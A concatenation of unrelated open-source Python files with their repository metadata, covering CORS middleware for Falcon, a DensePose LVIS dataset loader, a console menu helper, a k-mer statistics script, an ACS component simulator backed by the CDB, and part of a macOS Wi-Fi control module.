# Otherwise cache servers in front of the app (e.g. varnish) will cache
# this response
if self.origins_vary:
self._set_vary_origin(resp)
origin = req.get_header('origin')
# 6.1.1
# 6.2.1
if not origin:
self.logger.debug("Aborting response due to no origin header")
return
# 6.1.2
# 6.1.3 (Access-Control-Allow-Origin)
# 6.2.2
# 6.2.7 (Access-Control-Allow-Origin)
if not self._process_origin(req, resp, origin):
self.logger.info("Aborting response due to origin not allowed")
return
# Basic or actual request
if req.method != 'OPTIONS':
self.logger.debug("Processing basic or actual request")
# 6.1.3 (Access-Control-Allow-Credentials)
self._process_credentials(req, resp, origin)
# 6.1.4
self._process_expose_headers(req, resp)
# Preflight request
else:
self.logger.debug("Processing preflight request")
request_method = req.get_header('access-control-request-method')
# 6.2.3
if not request_method:
self.logger.info(
"Aborting response due to no access-control-request-method header"
)
return
# 6.2.4
requested_header_list = self._get_requested_headers(req)
# 6.2.5
# 6.2.9
if not self._process_methods(req, resp, resource):
self.logger.info("Aborting response due to unallowed method")
return
# 6.2.6
# 6.2.10
if not self._process_allow_headers(req, resp, requested_header_list):
self.logger.info("Aborting response due to unallowed headers")
return
# 6.2.7 (Access-Control-Allow-Credentials)
self._process_credentials(req, resp, origin)
# 6.2.8
self._process_max_age(req, resp)
def _process_origin(self, req, resp, origin):
"""Inspects the request and adds the Access-Control-Allow-Origin
header if the requested origin is allowed.
Returns:
``True`` if the header was added and the requested origin
is allowed, ``False`` if the origin is not allowed and the
header has not been added.
"""
if self._cors_config['allow_all_origins']:
if self.supports_credentials:
self._set_allow_origin(resp, origin)
else:
self._set_allow_origin(resp, '*')
return True
if origin in self._cors_config['allow_origins_list']:
self._set_allow_origin(resp, origin)
return True
regex = self._cors_config['allow_origins_regex']
if regex is not None:
if regex.match(origin):
self._set_allow_origin(resp, origin)
return True
return False
def _process_allow_headers(self, req, resp, requested_headers):
"""Adds the Access-Control-Allow-Headers header to the response,
using the cors settings to determine which headers are allowed.
Returns:
True if all the headers the client requested are allowed.
False if some or none of the headers the client requested are allowed.
"""
if not requested_headers:
return True
elif self._cors_config['allow_all_headers']:
self._set_allowed_headers(resp, requested_headers)
return True
approved_headers = []
for header in requested_headers:
if header.lower() in self._cors_config['allow_headers_list']:
approved_headers.append(header)
elif self._cors_config.get('allow_headers_regex'):
if self._cors_config['allow_headers_regex'].match(header):
approved_headers.append(header)
if len(approved_headers) == len(requested_headers):
self._set_allowed_headers(resp, approved_headers)
return True
return False
def _process_methods(self, req, resp, resource):
"""Adds the Access-Control-Allow-Methods header to the response,
using the cors settings to determine which methods are allowed.
"""
requested_method = self._get_requested_method(req)
if not requested_method:
return False
if self._cors_config['allow_all_methods']:
allowed_methods = self._get_resource_methods(resource)
self._set_allowed_methods(resp, allowed_methods)
if requested_method in allowed_methods:
return True
elif requested_method in self._cors_config['allow_methods_list']:
resource_methods = self._get_resource_methods(resource)
# Only list methods as allowed if they exist
# on the resource AND are in the allowed_methods_list
allowed_methods = [
method for method in resource_methods
if method in self._cors_config['allow_methods_list']
]
self._set_allowed_methods(resp, allowed_methods)
if requested_method in allowed_methods:
return True
return False
def _get_resource_methods(self, resource):
allowed_methods = []
for method in HTTP_METHODS:
if (
hasattr(resource, 'on_' + method.lower()) or
resource is None
):
allowed_methods.append(method)
return allowed_methods
def _process_credentials(self, req, resp, origin):
"""Adds the Access-Control-Allow-Credentials to the response
if the cors settings indicates it should be set.
"""
if self._cors_config['allow_credentials_all_origins']:
self._set_allow_credentials(resp)
return True
if origin in self._cors_config['allow_credentials_origins_list']:
self._set_allow_credentials(resp)
return True
credentials_regex = self._cors_config['allow_credentials_origins_regex']
if credentials_regex:
if credentials_regex.match(origin):
self._set_allow_credentials(resp)
return True
return False
def _process_expose_headers(self, req, resp):
for header in self._cors_config['expose_headers_list']:
resp.append_header('access-control-expose-headers', header)
def _process_max_age(self, req, resp):
if self._cors_config['max_age']:
resp.set_header('access-control-max-age', self._cors_config['max_age'])
def _get_requested_headers(self, req):
headers = []
raw_header = req.get_header('access-control-request-headers')
if raw_header is None:
return headers
for requested_header in raw_header.split(','):
requested_header = requested_header.strip()
if requested_header:
headers.append(requested_header)
return headers
def _get_requested_method(self, req):
return req.get_header('access-control-request-method')
def _set_allow_origin(self, resp, allowed_origin):
resp.set_header('access-control-allow-origin', allowed_origin)
def _set_allowed_headers(self, resp, allowed_header_list):
for allowed_header in allowed_header_list:
resp.append_header('access-control-allow-headers', allowed_header)
def _set_allowed_methods(self, resp, allowed_methods):
for method in allowed_methods:
resp.append_header('access-control-allow-methods', method)
def _set_allow_credentials(self, resp):
resp.set_header('access-control-allow-credentials', 'true')
def _set_vary_origin(self, resp):
resp.append_header('vary', 'origin')
| {
"content_hash": "7f49c1cc639af8386668503ca3e268ae",
"timestamp": "",
"source": "github",
"line_count": 456,
"max_line_length": 86,
"avg_line_length": 40.875,
"alnum_prop": 0.6118890498417298,
"repo_name": "lwcolton/falcon-cors",
"id": "d76cda46bc52c18c7057e43e20febb16f7f76bc2",
"size": "18639",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/falcon_cors/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "38260"
},
{
"name": "Shell",
"bytes": "622"
}
],
"symlink_target": ""
} |
import logging
import os
from typing import Any, Dict, Iterable, List, Optional
from fvcore.common.timer import Timer
from detectron2.data import DatasetCatalog, MetadataCatalog
from detectron2.data.datasets.lvis import get_lvis_instances_meta
from detectron2.structures import BoxMode
from detectron2.utils.file_io import PathManager
from ..utils import maybe_prepend_base_path
from .coco import (
DENSEPOSE_ALL_POSSIBLE_KEYS,
DENSEPOSE_METADATA_URL_PREFIX,
CocoDatasetInfo,
get_metadata,
)
DATASETS = [
CocoDatasetInfo(
name="densepose_lvis_v1_ds1_train_v1",
images_root="coco_",
annotations_fpath="lvis/densepose_lvis_v1_ds1_train_v1.json",
),
CocoDatasetInfo(
name="densepose_lvis_v1_ds1_val_v1",
images_root="coco_",
annotations_fpath="lvis/densepose_lvis_v1_ds1_val_v1.json",
),
CocoDatasetInfo(
name="densepose_lvis_v1_ds2_train_v1",
images_root="coco_",
annotations_fpath="lvis/densepose_lvis_v1_ds2_train_v1.json",
),
CocoDatasetInfo(
name="densepose_lvis_v1_ds2_val_v1",
images_root="coco_",
annotations_fpath="lvis/densepose_lvis_v1_ds2_val_v1.json",
),
CocoDatasetInfo(
name="densepose_lvis_v1_ds1_val_animals_100",
images_root="coco_",
annotations_fpath="lvis/densepose_lvis_v1_val_animals_100_v2.json",
),
]
def _load_lvis_annotations(json_file: str):
"""
Load COCO annotations from a JSON file
Args:
json_file: str
Path to the file to load annotations from
Returns:
Instance of `pycocotools.coco.COCO` that provides access to annotations
data
"""
from lvis import LVIS
json_file = PathManager.get_local_path(json_file)
logger = logging.getLogger(__name__)
timer = Timer()
lvis_api = LVIS(json_file)
if timer.seconds() > 1:
logger.info("Loading {} takes {:.2f} seconds.".format(json_file, timer.seconds()))
return lvis_api
def _add_categories_metadata(dataset_name: str) -> None:
metadict = get_lvis_instances_meta(dataset_name)
categories = metadict["thing_classes"]
metadata = MetadataCatalog.get(dataset_name)
metadata.categories = {i + 1: categories[i] for i in range(len(categories))}
logger = logging.getLogger(__name__)
logger.info(f"Dataset {dataset_name} has {len(categories)} categories")
def _verify_annotations_have_unique_ids(json_file: str, anns: List[List[Dict[str, Any]]]) -> None:
ann_ids = [ann["id"] for anns_per_image in anns for ann in anns_per_image]
assert len(set(ann_ids)) == len(ann_ids), "Annotation ids in '{}' are not unique!".format(
json_file
)
def _maybe_add_bbox(obj: Dict[str, Any], ann_dict: Dict[str, Any]) -> None:
if "bbox" not in ann_dict:
return
obj["bbox"] = ann_dict["bbox"]
obj["bbox_mode"] = BoxMode.XYWH_ABS
def _maybe_add_segm(obj: Dict[str, Any], ann_dict: Dict[str, Any]) -> None:
if "segmentation" not in ann_dict:
return
segm = ann_dict["segmentation"]
if not isinstance(segm, dict):
# filter out invalid polygons (< 3 points)
segm = [poly for poly in segm if len(poly) % 2 == 0 and len(poly) >= 6]
if len(segm) == 0:
return
obj["segmentation"] = segm
def _maybe_add_keypoints(obj: Dict[str, Any], ann_dict: Dict[str, Any]) -> None:
if "keypoints" not in ann_dict:
return
keypts = ann_dict["keypoints"] # list[int]
for idx, v in enumerate(keypts):
if idx % 3 != 2:
# COCO's segmentation coordinates are floating points in [0, H or W],
# but keypoint coordinates are integers in [0, H-1 or W-1]
# Therefore we assume the coordinates are "pixel indices" and
# add 0.5 to convert to floating point coordinates.
keypts[idx] = v + 0.5
obj["keypoints"] = keypts
def _maybe_add_densepose(obj: Dict[str, Any], ann_dict: Dict[str, Any]) -> None:
for key in DENSEPOSE_ALL_POSSIBLE_KEYS:
if key in ann_dict:
obj[key] = ann_dict[key]
def _combine_images_with_annotations(
dataset_name: str,
image_root: str,
img_datas: Iterable[Dict[str, Any]],
ann_datas: Iterable[Iterable[Dict[str, Any]]],
):
dataset_dicts = []
def get_file_name(img_root, img_dict):
# Determine the path including the split folder ("train2017", "val2017", "test2017") from
# the coco_url field. Example:
# 'coco_url': 'http://images.cocodataset.org/train2017/000000155379.jpg'
split_folder, file_name = img_dict["coco_url"].split("/")[-2:]
return os.path.join(img_root + split_folder, file_name)
for img_dict, ann_dicts in zip(img_datas, ann_datas):
record = {}
record["file_name"] = get_file_name(image_root, img_dict)
record["height"] = img_dict["height"]
record["width"] = img_dict["width"]
record["not_exhaustive_category_ids"] = img_dict.get("not_exhaustive_category_ids", [])
record["neg_category_ids"] = img_dict.get("neg_category_ids", [])
record["image_id"] = img_dict["id"]
record["dataset"] = dataset_name
objs = []
for ann_dict in ann_dicts:
assert ann_dict["image_id"] == record["image_id"]
obj = {}
_maybe_add_bbox(obj, ann_dict)
obj["iscrowd"] = ann_dict.get("iscrowd", 0)
obj["category_id"] = ann_dict["category_id"]
_maybe_add_segm(obj, ann_dict)
_maybe_add_keypoints(obj, ann_dict)
_maybe_add_densepose(obj, ann_dict)
objs.append(obj)
record["annotations"] = objs
dataset_dicts.append(record)
return dataset_dicts
def load_lvis_json(annotations_json_file: str, image_root: str, dataset_name: str):
"""
Loads a JSON file with annotations in LVIS instances format.
Replaces `detectron2.data.datasets.coco.load_lvis_json` to handle metadata
in a more flexible way. Postpones category mapping to a later stage to be
able to combine several datasets with different (but coherent) sets of
categories.
Args:
annotations_json_file: str
Path to the JSON file with annotations in COCO instances format.
image_root: str
directory that contains all the images
dataset_name: str
the name that identifies a dataset, e.g. "densepose_coco_2014_train"
extra_annotation_keys: Optional[List[str]]
If provided, these keys are used to extract additional data from
the annotations.
"""
lvis_api = _load_lvis_annotations(PathManager.get_local_path(annotations_json_file))
_add_categories_metadata(dataset_name)
# sort indices for reproducible results
img_ids = sorted(lvis_api.imgs.keys())
# imgs is a list of dicts, each looks something like:
# {'license': 4,
# 'url': 'http://farm6.staticflickr.com/5454/9413846304_881d5e5c3b_z.jpg',
# 'file_name': 'COCO_val2014_000000001268.jpg',
# 'height': 427,
# 'width': 640,
# 'date_captured': '2013-11-17 05:57:24',
# 'id': 1268}
imgs = lvis_api.load_imgs(img_ids)
logger = logging.getLogger(__name__)
logger.info("Loaded {} images in LVIS format from {}".format(len(imgs), annotations_json_file))
# anns is a list[list[dict]], where each dict is an annotation
# record for an object. The inner list enumerates the objects in an image
# and the outer list enumerates over images.
anns = [lvis_api.img_ann_map[img_id] for img_id in img_ids]
_verify_annotations_have_unique_ids(annotations_json_file, anns)
dataset_records = _combine_images_with_annotations(dataset_name, image_root, imgs, anns)
return dataset_records
def register_dataset(dataset_data: CocoDatasetInfo, datasets_root: Optional[str] = None) -> None:
"""
Registers provided LVIS DensePose dataset
Args:
dataset_data: CocoDatasetInfo
Dataset data
datasets_root: Optional[str]
Datasets root folder (default: None)
"""
annotations_fpath = maybe_prepend_base_path(datasets_root, dataset_data.annotations_fpath)
images_root = maybe_prepend_base_path(datasets_root, dataset_data.images_root)
def load_annotations():
return load_lvis_json(
annotations_json_file=annotations_fpath,
image_root=images_root,
dataset_name=dataset_data.name,
)
DatasetCatalog.register(dataset_data.name, load_annotations)
MetadataCatalog.get(dataset_data.name).set(
json_file=annotations_fpath,
image_root=images_root,
evaluator_type="lvis",
**get_metadata(DENSEPOSE_METADATA_URL_PREFIX),
)
def register_datasets(
datasets_data: Iterable[CocoDatasetInfo], datasets_root: Optional[str] = None
) -> None:
"""
Registers provided LVIS DensePose datasets
Args:
datasets_data: Iterable[CocoDatasetInfo]
An iterable of dataset datas
datasets_root: Optional[str]
Datasets root folder (default: None)
"""
for dataset_data in datasets_data:
register_dataset(dataset_data, datasets_root)
| {
"content_hash": "d369af6eb8aba2e696c478d48db14ed6",
"timestamp": "",
"source": "github",
"line_count": 256,
"max_line_length": 99,
"avg_line_length": 36.00390625,
"alnum_prop": 0.6432678745795812,
"repo_name": "facebookresearch/detectron2",
"id": "b4af9fa292f445c81dc840ab53d07c1af313dfc7",
"size": "9268",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "projects/DensePose/densepose/data/datasets/lvis.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "79417"
},
{
"name": "CMake",
"bytes": "616"
},
{
"name": "Cuda",
"bytes": "112955"
},
{
"name": "Dockerfile",
"bytes": "3209"
},
{
"name": "Python",
"bytes": "3261609"
},
{
"name": "Shell",
"bytes": "14448"
}
],
"symlink_target": ""
} |
from src.model.Sort import Sort
from src.independent.typing_imports import *
class AltUniverseConfig(NamedTuple):
name: str
sort_copies: Dict[str,Sort]
"""
For SAFE and KISS, I THINK just need to simultaneously substitute:
SApp('Dimensioned',NonnegReal,'$'), for SApp('Dimensioned',NonnegReal,'jVar')
Lighter notation...
In the following order. Substitute simultaneously even within sort op apps:
NonnegReal[$] for NonnegReal[jVar]
PosReal[Pos$] for PosReal[jVar]
Nat[Shares] for Nat[jVar]
PosInt[PosShares] for PosInt[jVar]
Then this???
Ratio(Shares,Pos$)[Shares/$] for Ratio(Nat[jVar],PosReal[jVar])
Or do we just want to *define*
Shares/$ := Ratio(Shares,Pos$) ??
"""
| {
"content_hash": "d22afd87690b4071df5b56aaa0b50881",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 79,
"avg_line_length": 28.833333333333332,
"alnum_prop": 0.7312138728323699,
"repo_name": "legalese/legalese-compiler",
"id": "2a87aebea66107d15c58f9162a2b980f9d013b61",
"size": "692",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "L4/pyL4/src/temp_src/alt_universe_config.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Common Lisp",
"bytes": "23607"
},
{
"name": "Grammatical Framework",
"bytes": "48526"
},
{
"name": "Haskell",
"bytes": "169801"
},
{
"name": "JavaScript",
"bytes": "30376"
},
{
"name": "Makefile",
"bytes": "658"
},
{
"name": "Nix",
"bytes": "25049"
},
{
"name": "Perl",
"bytes": "1775"
},
{
"name": "Prolog",
"bytes": "2845"
},
{
"name": "Python",
"bytes": "412846"
},
{
"name": "Shell",
"bytes": "348"
},
{
"name": "TeX",
"bytes": "114879"
}
],
"symlink_target": ""
} |
class UI(object):
def getInput(self, inputQuestion):
pass
def __printMenu(self,dOptionToFunction):
dKeyToOption = dict()
iCnt = 0
for sCurOption in dOptionToFunction:
dKeyToOption[str(iCnt)] = sCurOption[1]
print "%d for %s"%(iCnt, sCurOption[0])
iCnt+=1
return dKeyToOption
def menu(self, dOptionToFunction):
"""A menu that displays a set of options and maps their selection to functions.
The parameter dOptionToFunction contains tuples of the form ("value", func).
If func is not callable, then it is returned as a value. If it is callable, then
the returned value of the call is returned from the menu.
"""
dKeyToOption = self.__printMenu(dOptionToFunction)
sResp = raw_input()
while not (sResp in dKeyToOption):
print "\nWARNING: INVALID OPTION\nPlease select a valid option (From zero to %d)."%(len(dKeyToOption) - 1)
dKeyToOption = self.__printMenu(dOptionToFunction)
sResp = raw_input()
if type(dKeyToOption[sResp]).__name__ == "str":
return dKeyToOption[sResp]
else:
sRes = dKeyToOption[sResp]()
return sRes
if __name__ == "__main__":
import sys
ui = UI()
ui.menu([("Test1", lambda : sys.stdout.write("1 run!\n")),
("Test2" , lambda : sys.stdout.write("2 run!\n")),
("Exit", lambda: None)])
| {
"content_hash": "45f6532bc16b62db22c4c110a35259ad",
"timestamp": "",
"source": "github",
"line_count": 39,
"max_line_length": 112,
"avg_line_length": 34.69230769230769,
"alnum_prop": 0.6452328159645233,
"repo_name": "ggianna/Foragers",
"id": "42c5065721c24090c5b2ecc924ff102f3250e476",
"size": "1371",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ui.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "179234"
},
{
"name": "Shell",
"bytes": "3226"
}
],
"symlink_target": ""
} |
from __future__ import print_function
try: input = raw_input
except: pass
import sys
import csv
import re
#
# Read in distance matrices between raw, clean and perfect graphs for k=...
# output table: kmer,nkmers,raw_nkmers,raw_nreal,clean_nkmers,clean_nreal
#
def usage(argv,err=None):
if err is not None: print(err,file=sys.stderr)
print("usage: python",argv[0],"<dist.txt> ...",file=sys.stderr)
exit(-1)
def load_csv(csvpath):
m = []
with open(csvpath) as csvpath:
csvreader = csv.reader(csvpath, delimiter='\t', quotechar='"')
next(csvreader) # skip first row (column headers)
for row in csvreader:
m.append([ 0 if x == '.' else int(x) for x in row[1:]])
return m
def main(argv):
if len(argv) <= 1: usage(argv)
sep = ','
print("# Number of kmers in the perfect, raw and cleaned graphs")
print("# _nreal is the number of real kmers in the raw/cleaned graph")
print("# raw_errs, clean_errs are the fraction of error kmers in each graph")
print("# frac_remove_errs is the fraction of kmers removed that were seqn errs")
print(sep.join(["kmer","nkmers",
"raw_nkmers","raw_nreal",
"clean_nkmers","clean_nreal",
"raw_errs","clean_errs",
"frac_remove_errs"]))
for f in argv[1:]:
match = re.search('k([0-9]+)', f)
k = match.group(1)
m = load_csv(f)
nkmers = m[2][2]
raw_nkmers,raw_nreal = m[0][0],m[0][2]
clean_nkmers,clean_nreal = m[1][1],m[1][2]
raw_errs = (raw_nkmers-raw_nreal)/float(raw_nkmers)
clean_errs = (clean_nkmers-clean_nreal)/float(clean_nkmers)
kmers_removed = raw_nkmers-clean_nkmers
real_kmers_removed = raw_nreal-clean_nreal
frac_remove_errs = 1.0 - float(real_kmers_removed)/kmers_removed
r = [k,m[2][2],m[0][0],m[0][2],m[1][1],m[1][2],
"%.5f"%raw_errs,"%.5f"%clean_errs,"%.5f"%frac_remove_errs]
print(sep.join([str(x) for x in r]))
if __name__ == '__main__':
main(sys.argv)
| {
"content_hash": "6d824e90a218bad0d49ef8fb917b853f",
"timestamp": "",
"source": "github",
"line_count": 57,
"max_line_length": 82,
"avg_line_length": 34.666666666666664,
"alnum_prop": 0.618421052631579,
"repo_name": "mcveanlab/mccortex",
"id": "10138a86e697ee349bdfdcd704f00f218f9d77c9",
"size": "1998",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "results/kmer_size_experiment/results/make-cleaning-table.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "1460235"
},
{
"name": "C++",
"bytes": "25521"
},
{
"name": "Makefile",
"bytes": "173795"
},
{
"name": "Objective-C",
"bytes": "2925"
},
{
"name": "Perl",
"bytes": "166361"
},
{
"name": "Python",
"bytes": "67535"
},
{
"name": "R",
"bytes": "49544"
},
{
"name": "Roff",
"bytes": "10833"
},
{
"name": "Shell",
"bytes": "44299"
},
{
"name": "TeX",
"bytes": "4051"
}
],
"symlink_target": ""
} |
'''
Contains the concrete implementation of Acssim.Servants.Representations.
BaseRepresentation.
This particular implementation stores method/attribute definitions stored by
the ACS CDB.
'''
#--REGULAR IMPORTS-------------------------------------------------------------
from operator import isSequenceType
from traceback import print_exc
#--CORBA STUBS-----------------------------------------------------------------
#--ACS Imports-----------------------------------------------------------------
from Acspy.Util.XmlObjectifier import XmlObject
from Acspy.Common.Log import getLogger
from Acssim.Corba.Utilities import listToCodeObj
from Acssim.Goodies import getComponentXMLObj
from Acssim.Goodies import getCompLocalNSList
from Acssim.Servants.Representations.BaseRepresentation import BaseRepresentation
#--GLOBALS---------------------------------------------------------------------
__revision__ = "@(#) $Id$"
#------------------------------------------------------------------------------
class CDB(BaseRepresentation):
'''
Class derived from BaseRepresentation to be used only with the CDB. In other words,
this class searches the CDB for entries describing method/attribute return
values.
'''
#--------------------------------------------------------------------------
def __init__ (self, compname, supported_interfaces):
'''
Constructor.
Paramters:
- compname is the name of the component being simulated
- supported_interfaces is an optional list of IDL interfaces which
this particular component supports.
Returns: Nothing
Raises: ???
'''
#superclass constructor
BaseRepresentation.__init__(self, compname)
#setup the logger
self.__logger = getLogger(str(CDB) + "(" + compname + ")")
#bool value showing whether the CDB entry exists or not
self.exists=0
#determine if this simulated component allows inheritence
allows_inheritence = self.handleCDB(compname)
if allows_inheritence:
#look at all supported IDL interfaces first
self.handleInterfaces(supported_interfaces)
#add this individual component one more time to override
#anything defined in the subinterfaces. this is necessary if
#the component is of type IDL:alma/x/y:1.0 and this entry
#exists in the CDB
self.handleCDB(compname)
#--------------------------------------------------------------------------
def handleCDB(self, name):
'''
Handles an individual CDB entry. This means that if parameter, "name",
exists within the ACS CDB; we take all info found within the CDB XML
and add it to this object instance overriding previous
method/attribute defininitions where applicable.
Parameters: name is the name of the CDB XML within the /alma/simulated
section we are searching for.
Returns: True if the current XML allows us to look at superinterfaces.
False otherwise.
Raises: Nothing
'''
ret_val = True
#create an xml helper object
xml_obj = getComponentXMLObj(name)
# self.__logger.logInfo("xml_obj: " + xml_obj.toxml())
# work around for some odd behaviour of the CDB. If the simulated component
# node has sub nodes, then the SimulatedComponent element is replaced by the
# name of the root component
if xml_obj is not None:
try:
xml_obj.SimulatedComponent
except AttributeError:
new_el = xml_obj.createElement("SimulatedComponent")
for item in xml_obj.firstChild.attributes.items():
new_el.setAttribute(item[0], item[1])
for n in xml_obj.firstChild.childNodes:
if n.nodeType == xml_obj.ELEMENT_NODE:
new_el.appendChild(n)
xml_obj.removeChild(xml_obj.firstChild)
xml_obj.appendChild(new_el)
xml_obj = XmlObject(xml_obj.toxml())
if xml_obj!=None:
#at least one entry exists. good!
self.exists = 1
#get the corba methods
self.getCorbaMethods(xml_obj)
#get the corba attributes
self.getCorbaAttributes(xml_obj)
#setup the lifecycle methods
self.setupLifecyleMethods(xml_obj)
#allow inheritance?
ret_val = xml_obj.SimulatedComponent.getAttribute('AllowInheritance')
# self.__logger.logInfo("returning: " + str(ret_val))
return ret_val
#--------------------------------------------------------------------------
def handleInterfaces(self, supported_interfaces):
'''
Add behavior from derived interfaces for the concrete IDL interface.
Parameters: supported_interfaces is a list of IDL interface IDs.
Arrangement should matter - IDL does not support overriding
method declarations in subinterfaces. A simple list could be:
[ 'IDL:/alma/FRIDGE/FridgeControl:1.0',
'IDL:/alma/ACS/CharacteristicComponent:1.0']
Returns: Nothing
Raises: ???
'''
#convert the names in supported_interfaces to actual CDB locations
for supported_interface in supported_interfaces:
cdb_location = "interfaces/"
#Turn "IDL:alma/someModule/someInterface:1.0" into:
#"alma/someModule/someInterface/1.0/1.0"
try:
supported_interface = supported_interface.split('IDL:')[1].replace(":", "/")
except Exception, ex:
self.__logger.logWarning("Cannot parse '" + supported_interface +
"' to a CDB location!")
cdb_location = cdb_location + supported_interface
#now try to extract some useful info
self.handleCDB(cdb_location)
#--------------------------------------------------------------------------
def getCorbaMethods(self, xml_obj):
'''
Sets the CORBA methods of this object.
TODO: rename
'''
#methods is the somewhat formatted data taken from the XML. not really
#nice enough to work with yet.
try:
methods = xml_obj.SimulatedComponent._corbaMethod
if isSequenceType(methods)==0:
methods = [ methods ]
except:
return
#for each method in the list
for dom in methods:
#dictionary defining the method
temp_dict = {}
#extract the method name
methname = dom.getAttribute('Name')
#set the timeout
temp_dict['Timeout'] = float(dom.getAttribute('Timeout'))
#get the code to be executed yielding a return value
temp_dict['Value'] = dom.getValue().rstrip().lstrip().split('\n')
temp_dict['Value'] = getCompLocalNSList(self.compname) + temp_dict['Value']
temp_dict['Value'] = listToCodeObj(temp_dict['Value'], {})
#save the dictionary
self.setMethod(methname, temp_dict)
#--------------------------------------------------------------------------
def setupLifecyleMethods(self, xml_obj):
'''
Sets the lifecyle methods of the object.
'''
try:
dom = xml_obj.SimulatedComponent.initialize
methname = "initialize"
temp_dict = {}
temp_dict['Timeout'] = 0.0
#get the code to be executed yielding a return value
temp_dict['Value'] = dom.getValue().rstrip().lstrip().split('\n')
temp_dict['Value'] = getCompLocalNSList(self.compname) + temp_dict['Value']
temp_dict['Value'] = listToCodeObj(temp_dict['Value'], {})
#save the dictionary
self.setMethod(methname, temp_dict)
except:
pass
try:
dom = xml_obj.SimulatedComponent.cleanUp
temp_dict = {}
methname = "cleanUp"
temp_dict['Timeout'] = 0.0
#get the code to be executed yielding a return value
temp_dict['Value'] = dom.getValue().rstrip().lstrip().split('\n')
temp_dict['Value'] = getCompLocalNSList(self.compname) + temp_dict['Value']
temp_dict['Value'] = listToCodeObj(temp_dict['Value'], {})
#save the dictionary
self.setMethod(methname, temp_dict)
except:
pass
#--------------------------------------------------------------------------
def getCorbaAttributes(self, xml_obj):
'''
Sets the CORBA attributes of this object.
TODO: rename
'''
#attributes is the somewhat formatted data taken from the XML. not really
#nice enough to work with yet.
try:
attributes = xml_obj.SimulatedComponent._corbaAttribute
if isSequenceType(attributes)==0:
attributes = [ attributes ]
except:
return
#for each method in the list
for dom in attributes:
#dictionary defining the method
temp_dict = {}
#extract the method name
attrname= dom.getAttribute('Name')
#set the timeout
temp_dict['Timeout'] = float(dom.getAttribute('Timeout'))
#get the code to be executed yielding a return value
temp_dict['Value'] = dom.getValue().rstrip().lstrip().split('\n')
temp_dict['Value'] = getCompLocalNSList(self.compname) + temp_dict['Value']
temp_dict['Value'] = listToCodeObj(temp_dict['Value'], {})
#save the dictionary
self.setMethod(attrname, temp_dict)
#--------------------------------------------------------------------------
| {
"content_hash": "84e335913a016b4af95b5f599a0764dd",
"timestamp": "",
"source": "github",
"line_count": 257,
"max_line_length": 92,
"avg_line_length": 39.793774319066145,
"alnum_prop": 0.5341742446465239,
"repo_name": "csrg-utfsm/acscb",
"id": "b7b638c8ab37dba623441ffa272c18556a41efca",
"size": "11410",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "LGPL/CommonSoftware/acssim/src/Acssim/Servants/Representations/CDB.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Awk",
"bytes": "633"
},
{
"name": "Batchfile",
"bytes": "2346"
},
{
"name": "C",
"bytes": "751150"
},
{
"name": "C++",
"bytes": "7892598"
},
{
"name": "CSS",
"bytes": "21364"
},
{
"name": "Elixir",
"bytes": "906"
},
{
"name": "Emacs Lisp",
"bytes": "1990066"
},
{
"name": "FreeMarker",
"bytes": "7369"
},
{
"name": "GAP",
"bytes": "14867"
},
{
"name": "Gnuplot",
"bytes": "437"
},
{
"name": "HTML",
"bytes": "1857062"
},
{
"name": "Haskell",
"bytes": "764"
},
{
"name": "Java",
"bytes": "13573740"
},
{
"name": "JavaScript",
"bytes": "19058"
},
{
"name": "Lex",
"bytes": "5101"
},
{
"name": "Makefile",
"bytes": "1624406"
},
{
"name": "Module Management System",
"bytes": "4925"
},
{
"name": "Objective-C",
"bytes": "3223"
},
{
"name": "PLSQL",
"bytes": "9496"
},
{
"name": "Perl",
"bytes": "120411"
},
{
"name": "Python",
"bytes": "4191000"
},
{
"name": "Roff",
"bytes": "9920"
},
{
"name": "Shell",
"bytes": "1198375"
},
{
"name": "Smarty",
"bytes": "21615"
},
{
"name": "Tcl",
"bytes": "227078"
},
{
"name": "XSLT",
"bytes": "100454"
},
{
"name": "Yacc",
"bytes": "5006"
}
],
"symlink_target": ""
} |
"""Module for controlling a Wi-Fi interface using CoreWLAN.
https://developer.apple.com/library/mac/documentation/Networking/Reference/CoreWLANFrameworkRef/_index.html
"""
import logging
import os
import time
from . import cocoadialog
from . import defaults
# pylint: disable=g-import-not-at-top
try:
import objc
objc.loadBundle('CoreWLAN', globals(),
bundle_path='/System/Library/Frameworks/CoreWLAN.framework')
def R(selector, error_arg_num):
"""Register metadata for CWInterface selectors that return NSError values.
This tells the Objective-C bridge that the requested selector would normally
take a reference to an NSError as an argument and should instead return any
errors alongside the normal return values. This causes the method to return
a tuple of [Return value, Error or None].
Args:
selector: The selector as it's known in Objective-C
error_arg_num: Which numbered argument would the NSError be passed in
"""
objc.registerMetaDataForSelector(
'CWInterface', selector,
{'arguments': {error_arg_num + 1: {'type_modifier': 'o'}}})
R('scanForNetworksWithName:error:', 2)
R('setPower:error:', 2)
R('associateToNetwork:password:forceBSSID:remember:error:', 5)
del R
except ImportError:
if os.uname()[0] == 'Linux':
logging.debug('Skipping Mac imports for later mock purposes.')
else:
raise
# pylint: enable=g-import-not-at-top
GUEST_NETWORKS = defaults.GUEST_NETWORKS
GUEST_PSKS = defaults.GUEST_PSKS
def GetDefaultInterface():
"""Returns the default Wi-Fi interface."""
return CWInterface.interface() # pylint:disable=undefined-variable
def GetInterfaceName(interface=None):
"""Return the BSD name of the interface.
Args:
interface: the CWInterface to operate on.
Returns:
str: the BSD name of the interface, e.g. en0
"""
if not interface:
interface = GetDefaultInterface()
if not interface:
return None
return str(interface.interfaceName())
def GetInterfacePower(interface=None):
"""Determines if the interface is powered on.
Args:
interface: the CWInterface to operate on.
Returns:
bool: True if interface is on, False otherwise
"""
if not interface:
interface = GetDefaultInterface()
if not interface:
return False
return interface.power()
def SetInterfacePower(state, interface=None):
"""Sets an interfaces power state.
Args:
state: bool, True is on, False is off.
